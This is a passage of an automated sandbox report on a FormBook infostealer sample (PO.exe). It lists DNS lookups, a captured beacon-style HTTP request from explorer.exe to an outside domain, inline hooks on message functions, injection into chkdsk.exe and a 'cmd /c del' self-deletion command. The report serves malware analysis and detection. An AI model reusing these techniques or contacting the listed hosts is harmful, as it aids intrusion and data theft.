                                           Apr 8, 2021 12:13:20.221487999 CEST | 49992 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:13:20.282555103 CEST | 53 | 49992 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:13:30.721555948 CEST | 60075 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:13:30.733474970 CEST | 53 | 60075 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:13:33.983861923 CEST | 55016 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:13:33.997242928 CEST | 53 | 55016 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:13:40.495008945 CEST | 64345 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:13:40.540290117 CEST | 53 | 64345 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:13:53.829301119 CEST | 57128 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:13:53.862998009 CEST | 53 | 57128 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:14:01.800262928 CEST | 54791 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:14:01.924691916 CEST | 53 | 54791 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:14:15.857790947 CEST | 50463 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:14:15.872793913 CEST | 53 | 50463 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:14:17.984936953 CEST | 50394 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:14:18.019665003 CEST | 53 | 50394 | 8.8.8.8 | 192.168.2.5
                                           Apr 8, 2021 12:14:22.730901957 CEST | 58530 | 53 | 192.168.2.5 | 8.8.8.8
                                           Apr 8, 2021 12:14:22.908416986 CEST | 53 | 58530 | 8.8.8.8 | 192.168.2.5

                                          DNS Queries

                                           Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                           Apr 8, 2021 12:13:20.221487999 CEST | 192.168.2.5 | 8.8.8.8 | 0xef65 | Standard query (0) | www.ayescarrental.com | A (IP address) | IN (0x0001)
                                           Apr 8, 2021 12:13:40.495008945 CEST | 192.168.2.5 | 8.8.8.8 | 0x4eae | Standard query (0) | www.deerokoj.com | A (IP address) | IN (0x0001)
                                           Apr 8, 2021 12:14:01.800262928 CEST | 192.168.2.5 | 8.8.8.8 | 0x4e12 | Standard query (0) | www.riceandginger.com | A (IP address) | IN (0x0001)
                                           Apr 8, 2021 12:14:22.730901957 CEST | 192.168.2.5 | 8.8.8.8 | 0x2515 | Standard query (0) | www.665asilo.com | A (IP address) | IN (0x0001)

                                          DNS Answers

                                           Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                           Apr 8, 2021 12:13:40.540290117 CEST | 8.8.8.8 | 192.168.2.5 | 0x4eae | No error (0) | www.deerokoj.com | | 199.247.6.20 | A (IP address) | IN (0x0001)
                                           Apr 8, 2021 12:14:01.924691916 CEST | 8.8.8.8 | 192.168.2.5 | 0x4e12 | No error (0) | www.riceandginger.com | riceandginger.com | | CNAME (Canonical name) | IN (0x0001)
                                           Apr 8, 2021 12:14:01.924691916 CEST | 8.8.8.8 | 192.168.2.5 | 0x4e12 | No error (0) | riceandginger.com | | 162.241.24.122 | A (IP address) | IN (0x0001)
                                           Apr 8, 2021 12:14:22.908416986 CEST | 8.8.8.8 | 192.168.2.5 | 0x2515 | No error (0) | www.665asilo.com | tour.tourbuzz.net | | CNAME (Canonical name) | IN (0x0001)
                                           Apr 8, 2021 12:14:22.908416986 CEST | 8.8.8.8 | 192.168.2.5 | 0x2515 | No error (0) | tour.tourbuzz.net | tourbuzz.net | | CNAME (Canonical name) | IN (0x0001)
                                           Apr 8, 2021 12:14:22.908416986 CEST | 8.8.8.8 | 192.168.2.5 | 0x2515 | No error (0) | tourbuzz.net | | 52.20.218.92 | A (IP address) | IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • www.riceandginger.com

                                          HTTP Packets

                                           Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                           0 | 192.168.2.5 | 49727 | 162.241.24.122 | 80 | C:\Windows\explorer.exe
                                           Timestamp | kBytes transferred | Direction | Data
                                           Apr 8, 2021 12:14:02.069664001 CEST | 5414 | OUT | GET /fcn/?8p4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&sZCp=0btLwJX8eFdTeVr HTTP/1.1
                                          Host: www.riceandginger.com
                                          Connection: close
                                          Data Raw: 00 00 00 00 00 00 00
                                          Data Ascii:
                                           Apr 8, 2021 12:14:04.872277021 CEST | 5415 | IN | HTTP/1.1 301 Moved Permanently
                                          Date: Thu, 08 Apr 2021 10:14:04 GMT
                                          Server: nginx/1.19.5
                                          Content-Type: text/html; charset=UTF-8
                                          Content-Length: 0
                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                          X-Redirect-By: WordPress
                                          Location: http://riceandginger.com/fcn/?8p4=IIapObjlcsmN/tTUXuiVJ6SvcAdYVsMSy0eMvzJ/vGgposGY5YkWehqMwppvssjWa3vK&sZCp=0btLwJX8eFdTeVr
                                          host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                          X-Endurance-Cache-Level: 2
                                          X-Server-Cache: true
                                          X-Proxy-Cache: MISS


                                          Code Manipulations

                                          User Modules

                                          Hook Summary

                                           Function Name | Hook Type | Active in Processes
                                           PeekMessageA | INLINE | explorer.exe
                                           PeekMessageW | INLINE | explorer.exe
                                           GetMessageW | INLINE | explorer.exe
                                           GetMessageA | INLINE | explorer.exe

                                          Processes

                                          Process: explorer.exe, Module: user32.dll
                                           Function Name | Hook Type | New Data
                                           PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xEF
                                           PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xEF
                                           GetMessageW | INLINE | 0x48 0x8B 0xB8 0x82 0x2E 0xEF
                                           GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8A 0xAE 0xEF

                                          Statistics

                                          Behavior


                                          System Behavior

                                          General

                                          Start time:12:12:27
                                          Start date:08/04/2021
                                          Path:C:\Users\user\Desktop\PO.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\PO.exe'
                                          Imagebase:0x400000
                                          File size:227498 bytes
                                          MD5 hash:BA83B33D39CA6C3BF1F311D1B6A38D1A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.240240233.0000000002670000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                          Reputation:low

                                          General

                                          Start time:12:12:29
                                          Start date:08/04/2021
                                          Path:C:\Users\user\Desktop\PO.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\user\Desktop\PO.exe'
                                          Imagebase:0x400000
                                          File size:227498 bytes
                                          MD5 hash:BA83B33D39CA6C3BF1F311D1B6A38D1A
                                          Has elevated privileges:true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.281309352.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.281955301.0000000000CF0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.281979783.0000000000D20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000001.235598141.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 12:12:33
Start date: 08/04/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff693d90000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 12:12:50
Start date: 08/04/2021
Path: C:\Windows\SysWOW64\chkdsk.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\chkdsk.exe
Imagebase: 0x7ff797770000
File size: 23040 bytes
MD5 hash: 2D5A2497CB57C374B3AE3080FF9186FB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.495059747.0000000000200000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.496196901.0000000004B30000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 12:12:54
Start date: 08/04/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\PO.exe'
Imagebase: 0x980000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 12:12:55
Start date: 08/04/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis
